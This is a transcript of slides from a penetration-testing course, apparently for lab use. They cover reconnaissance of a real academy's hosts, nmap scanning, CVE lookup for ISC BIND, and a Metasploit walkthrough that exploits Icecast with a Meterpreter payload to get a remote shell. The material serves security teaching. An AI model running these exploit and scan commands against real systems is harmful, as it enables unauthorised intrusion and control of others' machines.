Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Published byMohamed Grundy Modified over 9 years ago

Similar presentations

Presentation on theme: "Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine."— Presentation transcript:

1 Part 2 Penetration Testing

2 Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine Academy” to find URL site:usmma.edu site:usmma,edu –www.usmma.edu nslookup blackboard.usmma.edu nslookup...

3 Review 1-minute exercise: Use nmap to find all of the IP addresses in your group’s network (10.10.1.0/24) nmap –sn 10.10.1.*

4 Review 1-minute exercise: Use nmap to find all of the open ports on 10.10.1.15. Looking at the open ports, what type of server is this? nmap 10.10.1.15 DNS

5 Review 2-minute exercise: Use nmap to find the version of the DNS server running on 10.10.1.15, port 53. ssh into 10.10.1.15 and run this command to verify: /usr/sbin/named -ver sudo nmap –sV 10.10.1.15 ISC BIND 9.8.1-P1

6 Phase 3 - Penetration The goal of this step is to obtain a shell or run code on a remote machine. 90% research 10% attack Method: 1. Pick a host to exploit 2. Pick a running service on that host to exploit 3. Find out the version of the service 4. Find an exploit that works against that version 5. Run the exploit 6. Repeat as required

7 Metasploit Pentester tool/hacker tool Provides information about known security vulnerabilities Three types of tools: exploits: code to overflow buffers/break into servers payloads: code to provide access to OS, often a shell auxiliary: misc functions, usually to retrieve information, such as version numbers

8 CVE Common Vulnerabilities and Exposures (CVE) Reference system for known vulnerabilities Managed by MITRE Corporation Funded by DHS’s National Cyber Security Division http://cve.mitre.org Info is mirrored on multiple other sites, e.g.: http://cvedetails.com

9 CVE When in doubt, ask Google:... Google: cve isc bind 9.8.1-P1 CVE-2012-1667 CVE-2012-1033 CVE-2012-5688 CVE-2013-2266 Three types of tools: exploits: code to overflow buffers/break into servers payloads: code to provide access to OS, often a shell auxiliary: misc functions, usually to retrieve information, such as version numbers

10 Metasploit – find version of server $ msfconsole > search ssh > use auxiliary/scanner/ssh/ssh_version > show options > set RHOSTS 14.29.4.105 > exploit Similiar to: nmap –sV 14.29.4.105 –p22

11 Exploit walkthrough Target machine is 14.29.4.100 nmap –O 14.29.4.100 nmap –sV 14.29.4.100 Google: cve icecast $ msfconsole > search icecast > use exploit/windows/http/icecast_header > show options > set RHOST 14.29.4.100 > set PAYLOAD windows/meterpreter/bind_tcp > exploit

12 Meterpreter basics Meterpreter is a special shell injected as our payload Useful commands: getwd # show the current working directory sysinfo # print system info (name, OS, etc.) ipconfig # network info ps # list all process upload dest> download shell # Obtain a Windows shell (Win hosts only)

Download ppt "Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine."

Similar presentations

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
The Internet Useful Definitions and Concepts About the Internet.

The Internet Useful Definitions and Concepts About the Internet.
Penetration Testing.

Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.

Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Port Scanning.

Port Scanning.
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.

Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Ana Chanaba Robert Huylo

Ana Chanaba Robert Huylo
Lab #2 CT1406 By Asma AlOsaimi. Security has been a major concern in today’s computer networks. There has been various exploits of attacks against companies,

Lab #2 CT1406 By Asma AlOsaimi. "Security has been a major concern in today’s computer networks. There has been various exploits of attacks against companies,
Penetration Testing Training Day Capture the Flag Training.

Penetration Testing Training Day Capture the Flag Training.
MIS 5212.001 Week 2 Site:

MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
Honeypot and Intrusion Detection System

Honeypot and Intrusion Detection System
Attack Lifecycle Many attacks against information systems follow a standard lifecycle: –Stage 1: Info. gathering (reconnaissance) –Stage 2: Penetration.

Attack Lifecycle Many attacks against information systems follow a standard lifecycle: –Stage 1: Info. gathering (reconnaissance) –Stage 2: Penetration.
Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.

Chapter 1: The Internet and the WWW CIS 275—Web Application Development for Business I.
CIS 450 – Network Security Chapter 3 – Information Gathering.

CIS 450 – Network Security Chapter 3 – Information Gathering.

Similar presentations

Ads by Google